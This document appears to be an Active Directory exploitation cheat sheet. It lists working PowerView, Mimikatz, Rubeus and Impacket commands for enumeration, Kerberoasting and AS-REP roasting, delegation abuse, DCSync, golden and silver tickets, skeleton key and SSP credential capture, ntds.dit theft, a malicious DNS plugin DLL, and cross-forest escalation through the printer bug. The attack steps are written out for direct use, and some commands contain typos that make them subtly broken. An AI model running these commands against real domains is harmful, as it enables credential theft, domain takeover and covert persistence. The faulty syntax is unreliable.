A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.
This cheat sheet is inspired by the PayloadAllTheThings repo.
- Active Directory Exploitation Cheatsheet
- Summary
- Tools
- Enumeration
- Local Privilege Escalation
- Lateral Movement
- Domain Privilege Escalation
- Kerberoast
- ASREPRoast
- Password Spray Attack
- Force Set SPN
- Abusing Shadow Copies
- List and Decrypt Stored Credentials
- Unconstrained Delegation
- Constrained Delegation
- Resource Based Constrained Delegation
- DNSAdmins Abuse
- Abusing Active Directory-Integraded DNS
- Abusing Backup Operators Group
- Abusing Exchange
- Weaponizing Printer Bug
- Abusing ACLs
- Abusing IPv6 with mitm6
- SID History Abuse
- Domain Persistence
- Cross Forest Attacks
- Powersploit
- PowerUpSQL
- Powermad
- Impacket
- Mimikatz
- Rubeus -> Compiled Version
- BloodHound
- AD Module
- ASREPRoast
-
Get Current Domain:
Get-NetDomain
-
Enum Other Domains:
Get-NetDomain -Domain <DomainName>
-
Get Domain SID:
Get-DomainSID
-
Get Domain Policy:
Get-DomainPolicy #Will show us the policy configurations of the Domain about system access or kerberos (Get-DomainPolicy)."system access" (Get-DomainPolicy)."kerberos policy"
-
Get Domain Controlers:
Get-NetDomainController Get-NetDomainController -Domain <DomainName>
-
Enumerate Domain Users:
Get-NetUser Get-NetUser -SamAccountName <user> Get-NetUser | select cn Get-UserProperty #Check last password change Get-UserProperty -Properties pwdlastset #Get a spesific "string" on a user's attribute Find-UserField -SearchField Description -SearchTerm "wtver" #Enumerate user logged on a machine Get-NetLoggedon -ComputerName <ComputerName> #Enumerate Session Information for a machine Get-NetSession -ComputerName <ComputerName>
-
Enum Domain Computers:
Get-NetComputer -FullData Get-DomainGroup #Enumerate Live machines Get-NetComputer -Ping
-
Enumerate Shares
#Enumerate Domain Shares Find-DomainShare #Enumerate Domain Shares the current user has access Find-DomainShare -CheckShareAccess
-
Enum Group Policies:
Get-NetGPO # Shows active Policy on specified machine Get-NetGPO -ComputerName <Name of the PC> Get-NetGPOGroup #Get users that are part of a Machine's local Admin group Find-GPOComputerAdmin -ComputerName <ComputerName>
-
Enum OUs:
Get-NetOU -FullData Get-NetGPO -GPOname <The GUID of the GPO>
-
Enum ACLs:
# Returns the ACLs associated with the specified account Get-ObjectAcl -SamAccountName <AccountName> -ResolveGUIDs Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose #Search for interesting ACEs Invoke-ACLScanner -ResolveGUIDs #Check the ACLs associated with a specified path (e.g smb share) Get-PathAcl -Path "\\Path\Of\A\Share"
-
Enum Domain Trust:
Get-NetDomainTrust Get-NetDomainTrust -Domain <Specific Domain>
-
Enum Forest Trust:
Get-NetForestDomain Get-NetForestDomain Forest <ForestName> #Domains of Forest Enumeration Get-NetForestDomain Get-NetForestDomain Forest <ForestName> #Map the Trust of the Forest Get-NetForestTrust Get-NetDomainTrust -Forest <ForestName>
-
User Hunting:
#Finds all machines on the current domain where the current user has local admin access Find-LocalAdminAccess -Verbose #Find local admins on all machines of the domain: Invoke-EnumerateLocalAdmin -Verbose #Find computers were a Domain Admin OR a spesified user has a session Invoke-UserHunter Invoke-UserHunter -GroupName "RDPUsers" Invoke-UserHunter -Stealth #Confirming admin access: Invoke-UserHunter -CheckAccess
❗ Priv Esc to Domain Admin with User Hunting:
I have local admin access on a machine -> A Domain Admin has a session on that machine -> I steal his token and impersonate him ->
Profit!
- Get Current Domain:
Get-ADDomain
- Enum Other Domains:
Get-ADDomain -Identity <Domain>
- Get Domain SID:
Get-DomainSID
- Get Domain Controlers:
Get-ADDomainController Get-ADDomainController -Identity <DomainName>
- Enumerate Domain Users:
Get-ADUser -Filter * -Identity <user> -Properties * #Get a spesific "string" on a user's attribute Get-ADUser -Filter 'Description -like "*wtver*"' -Properties Description | select Name, Description
- Enum Domain Computers:
Get-ADComputer -Filter * -Properties * Get-ADGroup -Filter *
- Enum Domain Trust:
Get-ADTrust -Filter * Get-ADTrust -Identity <Specific Domain>
- Enum Forest Trust:
Get-ADForest Get-ADForest -Identity <ForestName> #Domains of Forest Enumeration (Get-ADForest).Domains
#Using exe ingestor
.\SharpHound.exe --CollectionMethod All --LDAPUser <UserName> --LDAPPass <Password> --JSONFolder <PathToFile>
#Using powershell module ingestor
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -LDAPUser <UserName> -LDAPPass <Password> -OutputDirectory <PathToFile>
- ldapdomaindump Information dumper via LDAP
- adidnsdump Integrated DNS dumping by any authenticated user
#Enable Powershell Remoting on current Machine (Needs Admin Access)
Enable-PSRemoting
#Entering or Starting a new PSSession (Needs Admin Access)
$sess = New-PSSession -ComputerName <Name>
Enter-PSSession -ComputerName <Name> OR -Sessions <SessionName>
$SecPassword = ConvertTo-SecureString '<Wtver>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\<WtverUser>', $SecPassword)
Invoke-Command -ComputerName <WtverMachine> -Credential $Cred -ScriptBlock {whoami}
#Execute the command and start a session
Invoke-Command -Credential $cred -ComputerName <NameOfComputer> -FilePath c:\FilePath\file.ps1 -Session $sess
#Interact with the session
Enter-PSSession -Session $sess
#Create a new session
$sess = New-PSSession -ComputerName <NameOfComputer>
#Execute command on the session
Invoke-Command -Session $sess -ScriptBlock {$ps = Get-Process}
#Check the result of the command to confirm we have an interactive session
Invoke-Command -Session $sess -ScriptBlock {$ps}
#Dump credentials:
Invoke-Mimikatz -DumpCreds
#Dump credentials in remote machines:
Invoke-Mimikatz -DumpCreds -ComputerName <ComputerName>
#Execute classic mimikatz commands:
Invoke-Mimikatz -Command '"sekrlusa::<ETC ETC>"'
- Powercat netcat written in powershell, and provides tunneling, relay and portforward capabilities.
- SCShell fileless lateral movement tool that relies on ChangeServiceConfigA to run command
- Evil-Winrm the ultimate WinRM shell for hacking/pentesting
- PowerView:
#Get User Accounts that are used as Service Accounts
Get-NetUser -SPN
#Get every available SPN account, request a TGS and dump its hash
Invoke-Kerberoast
#Requesting the TGS for a single account:
Request-SPNTicket
#Export all tickets using Mimikatz
Invoke-Mimikatz -Command '"kerberos::list /export"'
- AD Module:
#Get User Accounts that are used as Service Accounts
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
- Impacket:
python GetUserSPNs.py <DomainName>/<DomainUser>:<Password> -outputfile <FileName>
- PowerView:
Get-DomainUser -PreauthNotRequired -Verbose
- AD Module:
Get-ADUser -Filter {DoesNoteRequirePreAuth -eq $True} -Properties DoesNoteRequirePreAuth
Forcefuly Disable Kerberos Preauth on an account i have Write Permissions or more! Check for interesting permissions on accounts:
Hint: We add a filter e.g. RDPUsers to get "User Accounts" not Machine Accounts, because Machine Account hashes are not crackable!
PowerView:
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
Disable Kerberos Preauth:
Set-DomainObject -Identity <UserAccount> -XOR @{useraccountcontrol=4194304} -Verbose
Check if the value changed:
Get-DomainUser -PreauthNotRequired -Verbose
And finally execute the attack using the ASREPRoast tool.
#Get a spesific Accounts hash:
Get-ASREPHash -UserName <UserName> -Verbose
#Get any ASREPRoastable Users hashes:
Invoke-ASREPRoast -Verbose
Using Rubeus:
#Trying the attack for all domain users
.\Rubeus.exe asreproast /outfile:<NameOfTheFile>
Using Impacket:
#Trying the attack for the specified users on the file
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -outputfile <FileName>
If we have harvest some passwords by compromising a user account, we can use this method to try and exploit password reuse on other domain accounts.
Tools:
WUT IS DIS ?: If we have enough permissions -> GenericAll/GenericWrite we can set a SPN on a target account, request a TGS, then grab its hash and kerberoast it.
- PowerView:
#Check for interesting permissions on accounts:
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
#Check if current user has already an SPN setted:
Get-DomainUser -Identity <UserName> | select serviceprincipalname
#Force set the SPN on the account:
Set-DomainObject <UserName> -Set @{serviceprincipalname='ops/whatever1'}
- AD Module:
#Check if current user has already an SPN setted
Get-ADUser -Identity <UserName> -Properties ServicePrincipalName | select ServicePrincipalName
#Force set the SPN on the account:
Set-ADUser -Identiny <UserName> -ServicePrincipalNames @{Add='ops/whatever1'}
Finally use any tool from before to grab the hash and kerberoast it!
If you have local administrator access on a machine try to list shadow copies, it's an easy way for Privilege Escalation.
#List shadow copies using vssadmin (Needs Admnistrator Access)
vssadmin list shadows
#List shadow copies using diskshadow
diskshadow list shadows all
#Make a symlink to the shadow copy and access it
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
- You can dump the backuped SAM database and harvest credentials.
- Look for DPAPI stored creds and decrypt them.
- Access backuped sensitive files.
WUT IS DIS ?: If we have Administrative access on a machine that has Unconstrained Delegation enabled, we can wait for a high value target or DA to connect to it, steal his TGT then ptt and impersonate him!
Using PowerView:
#Discover domain joined computers that have Unconstrained Delegation enabled
Get-NetComputer -UnConstrained
#List tickets and check if a DA or some High Value target has stored its TGT
Invoke-Mimikatz -Command '"sekurlsa::tickets"'
#Command to monitor any incoming sessions on our compromised server
Invoke-UserHunter -ComputerName <NameOfTheComputer> -Poll <TimeOfMonitoringInSeconds> -UserName <UserToMonitorFor> -Delay
<WaitInterval> -Verbose
#Dump the tickets to disk:
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
#Impersonate the user using ptt attack:
Invoke-Mimikatz -Command '"kerberos::ptt <PathToTicket>"'
Note: We can also use Rubeus!
Using PowerView and Kekeo:
#Enumerate Users and Computers with constrained delegation
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
#If we have a user that has Constrained delegation, we ask for a valid tgt of this user using kekeo
tgt::ask /user:<UserName> /domain:<Domain's FQDN> /rc4:<hashedPasswordOfTheUser>
#Then using the TGT we have ask a TGS for a Service this user has Access to through constrained delegation
tgs::s4u /tgt:<PathToTGT> /user:<UserToImpersonate>@<Domain's FQDN> /service:<Service's SPN>
#Finally use mimikatz to ptt the TGS
Invoke-Mimikatz -Command '"kerberos::ptt <PathToTGS>"'
ALTERNATIVE: Using Rubeus:
Rubeus.exe s4u /user:<UserName> /rc4:<NTLMhashedPasswordOfTheUser> /impersonateuser:<UserToImpersonate> /msdsspn:"<Service's SPN>" /altservice:<Optional> /ptt
Now we can access the service as the impersonated user!
🚩 If we have a machine account with Constrained Delegation:
We can do the same steps as before, but insted of a user account we can use the machine's account!
A nice misconfiguration is that even if we have only specified service that the machine account is allowed to delegate to, we can
delegate to any service that "uses" this machine account!
For example if the machine account is trusted to telegate to the DC for the "time" service, we are able to use any service we want -> ldap, cifs etc!
That is super important and abusive, since if i can use ldap on DC i can DCsync impersonating the Domain Admnistrator!
WUT IS DIS?:
TL;DR
If we have GenericALL/GenericWrite privileges on a machine account object of a domain, we can abuse it and impersonate ourselves as any user of the domain to it. For example we can impersonate Domain Administrator and have complete access.
Tools we are going to use:
First we need to enter the security context of the user/machine account that has the privileges over the object. If it is a user account we can use Pass the Hash, RDP, PSCredentials etc.
Exploitation Example:
#Import Powermad and use it to create a new MACHINE ACCOUNT
. .\Powermad.ps1
New-MachineAccount -MachineAccount <MachineAccountName> -Password $(ConvertTo-SecureString 'p@ssword!' -AsPlainText -Force) -Verbose
#Import PowerView and get the SID of our new created machine account
. .\PowerView.ps1
$ComputerSid = Get-DomainComputer <MachineAccountName> -Properties objectsid | Select -Expand objectsid
#Then by using the SID we are going to build an ACE for the new created machine account using a raw security descriptor:
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
#Next, we need to set the security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, again using PowerView
Get-DomainComputer TargetMachine | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
#After that we need to get the RC4 hash of the new machine account's password using Rubeus
Rubeus.exe hash /password:'p@ssword!'
#And for this example, we are going to impersonate Domain Administrator on the cifs service of the target computer using Rubeus
Rubeus.exe s4u /user:<MachineAccountName> /rc4:<RC4HashOfMachineAccountPassword> /impersonateuser:Administrator /msdsspn:cifs/TargetMachine.wtver.domain /domain:wtver.domain /ptt
#Finally we can access the C$ drive of the target machine
dir \\TargetMachine.wtver.domain\C$
Detailed Articles:
- Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory
- RESOURCE-BASED CONSTRAINED DELEGATION ABUSE
WUT IS DIS ?: If a user is a member of the DNSAdmins group, he can possibly load an arbitary DLL with the privileges of dns.exe that runs as SYSTEM. In case the DC serves a DNS, the user can escalate his privileges to DA. This exploitation process needs privileges to restart the DNS service to work.
- Enumerate the members of the DNSAdmins group:
- PowerView:
Get-NetGroupMember -GroupName "DNSAdmins"
- AD Module:
Get-ADGroupMember -Identiny DNSAdmins
- PowerView:
- Once we found a member of this group we need to compromise it (There are many ways).
- Then by serving a malicious DLL on a SMB share and configuring the dll usage,we can escalate our privileges:
#Using dnscmd: dnscmd <NameOfDNSMAchine> /config /serverlevelplugindll \\Path\To\Our\Dll\malicious.dll #Restart the DNS Service: sc \\DNSServer stop dns sc \\DNSServer start dns
WUT IS DIS ?: If we manage to compromise a user account that is member of the Backup Operators group, we can then abuse it's SeBackupPrivilege to create a shadow copy of the current state of the DC, extract the ntds.dit database file, dump the hashes and escalate our privileges to DA.
- Once we have access on an account that has the SeBackupPrivilege we can access the DC and create a shadow copy using the signed binary diskshadow:
#Create a .txt file that will contain the shadow copy process script
Script ->{
set metadata c:\<PathToSave>metadata.cab
set context clientaccessible
set context persistent
begin backup
add volume c: alias mydrive
create
expose %mydrive% w:
}
- Next we need to access the shadow copy, we may have the SeBackupPrivilege but we cant just simply copy-paste ntds.dit, we need to mimic a backup software and use Win32 API calls to copy it on an accessible folder. For this we are going to use this amazing repo:
#Importing both dlls from the repo using powershell
Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
#Checking if the SeBackupPrivilege is enabled
Get-SeBackupPrivilege
#If it isn't we enable it
Set-SeBackupPrivilege
#Use the functionality of the dlls to copy the ntds.dit database file from the shadow copy to a location of our choice
Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\<PathToSave>\ntds.dit -Overwrite
#Dump the SYSTEM hive
reg save HKLM\SYSTEM c:\temp\system.hive
- Using smbclient.py from impacket or some other tool we copy ntds.dit and the SYSTEM hive on our local machine.
- Use secretsdump.py from impacket and dump the hashes.
- Use psexec or another tool of your choice to PTH and get Domain Admin access.
- Abusing Exchange one Api call from DA
- CVE-2020-0688
- PrivExchange Exchange your privileges for Domain Admin privs by abusing Exchange
WUT IS DIS?: If we manage to compromise a child domain of a forest and SID filtering isn't enabled (most of the times is not), we can abuse it to privilege escalate to Domain Administrator of the root domain of the forest. This is possible because of the SID History field on a kerberos TGT ticket, that defines the "extra" security groups and privileges.
Exploitation example:
#Get the SID of the Root Domain using PowerView
Get-DomainSID -Domain root.domain.local
#Create the Enteprise Admins SID
Format: S-1-5-21-RootDomainSID-519
#Forge "Extra" Golden Ticket using mimikatz
kerberos::golden /user:Administrator /domain:root.domain.local /sid:<CurrentDomainSID> /krbtgt:<krbtgtHash> /sids:<EnterpriseAdminsSID> /startoffset:0 /endin:600 /renewmax:10080 /ticket:\path\to\ticket\golden.kirbi
#Inject the ticket into memory
kerberos::ptt \path\to\ticket\golden.kirbi
#List the DC of the Root Domain
dir \\dc.root.domain.local\C$
#Or DCsync and dump the hashes using mimikatz
lsadump::dcsync /domain:root.domain.local /all
Detailed Articles:
#Execute mimikatz on DC as DA to grab krbtgt hash:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName <DC'sName>
#On any machine:
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<DomainName> /sid:<Domain's SID> /krbtgt:
<HashOfkrbtgtAccount> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
#DCsync using mimikatz (You need DA rights or DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges):
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DomainName>\<AnyDomainUser>"'
#DCsync using secretsdump.py from impacket with NTLM authentication
secretsdump.py <Domain>/<Username>:<Password>@<DC'S IP or FQDN> -just-dc-ntlm
#DCsync using secretsdump.py from impacket with Kerberos Authentication
secretsdump.py -no-pass -k <Domain>/<Username>@<DC'S IP or FQDN> -just-dc-ntlm
Tip:
/ptt -> inject ticket on current running session
/ticket -> save the ticket on the system for later use
Invoke-Mimikatz -Command '"kerberos::golden /domain:<DomainName> /sid:<DomainSID> /target:<TheTargetMachine> /service:
<ServiceType> /rc4:<TheSPN's Account NTLM Hash> /user:<UserToImpersonate> /ptt"'
#Exploitation Command runned as DA:
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DC's FQDN>
#Access using the password "mimikatz"
Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\Administrator
WUT IS DIS?: Every DC has a local Administrator account, this accounts has the DSRM password which is a SafeBackupPassword. We can get this and then pth its NTLM hash to get local Administrator access to DC!
#Dump DSRM password (needs DA privs):
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName <DC's Name>
#This is a local account, so we can PTH and authenticate!
#BUT we need to alter the behaviour of the DSRM account before pth:
#Connect on DC:
Enter-PSSession -ComputerName <DC's Name>
#Alter the Logon behaviour on registry:
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD -Verbose
#If the property already exists:
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -Verbose
Then just PTH to get local admin access on DC!
WUT IS DIS?: We can set our on SSP by dropping a custom dll, for example mimilib.dll from mimikatz, that will monitor and capture plaintext passwords from users that logged on!
From powershell:
#Get current Security Package:
$packages = Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
#Append mimilib:
$packages += "mimilib"
#Change the new packages name
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' -Value $packages
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name 'Security Packages' -Value $packages
#ALTERNATIVE:
Invoke-Mimikatz -Command '"misc::memssp"'
Now all logons on the DC are logged to -> C:\Windows\System32\kiwissp.log
WUT IS DIS ?: If we have Domain Admin rights on a Domain that has Bidirectional Trust relationship with an other forest we can get the Trust key and forge our own inter-realm TGT.
Using Mimikatz:
#Dump the trust key
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
#Forge an inter-realm TGT using the Golden Ticket attack
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<OurDomain> /sid:
<OurDomainSID> /rc4:<TrustKey> /service:krbtgt /target:<TheTargetDomain> /ticket:
<PathToSaveTheGoldenTicket>"'
❗ Tickets -> .kirbi format
Then Ask for a TGS to the external Forest for any service using the inter-realm TGT and access the resource!
Using Rubeus:
.\Rubeus.exe asktgs /ticket:<kirbi file> /service:"Service's SPN" /ptt
- Enumerate MSSQL Instances:
Get-SQLInstanceDomain
- Check Accessibility as current user:
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
- Gather Information about the instance:
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
- Abusing SQL Database Links:
WUT IS DIS?: A database link allows a SQL Server to access other resources like other SQL Server. If we have two linked SQL Servers we can execute stored procedures in them. Database links also works across Forest Trust!
Check for existing Database Links:
#Check for existing Database Links:
#PowerUpSQL:
Get-SQLServerLink -Instace <SPN> -Verbose
#MSSQL Query:
select * from master..sysservers
Then we can use queries to enumerate other links from the linked Database:
#Manualy:
select * from openquery("LinkedDatabase", 'select * from master..sysservers')
#PowerUpSQL (Will Enum every link across Forests and Child Domain of the Forests):
Get-SQLServerLinkCrawl -Instance <SPN> -Verbose
#Then we can execute command on the machine's were the SQL Service runs using xp_cmdshell
#Or if it is disabled enable it:
EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;') AT "SPN"
Query execution:
Get-SQLServerLinkCrawl -Instace <SPN> -Query "exec master..xp_cmdshell 'whoami'"
WUT IS DIS?:
TL;DR
If we have a bidirectional trust with an external forest and we manage to compromise a machine on the local forest that has enabled unconstrained delegation (DCs have this by default), we can use the printerbug to force the DC of the external forest's root domain to authenticate to us. Then we can capture it's TGT, inject it into memory and DCsync to dump it's hashes, giving ous complete access over the whole forest.
Tools we are going to use:
Exploitation example:
#Start monitoring for TGTs with rubeus:
Rubeus.exe monitor /interval:5 /filteruser:target-dc$
#Execute the printerbug to trigger the force authentication of the target DC to our machine
SpoolSample.exe target-dc$.external.forest.local dc.compromised.domain.local
#Get the base64 captured TGT from Rubeus and inject it into memory:
Rubeus.exe ptt /ticket:<Base64ValueofCapturedTicket>
#Dump the hashes of the target domain using mimikatz:
lsadump::dcsync /domain:external.forest.local /all
Detailed Articles: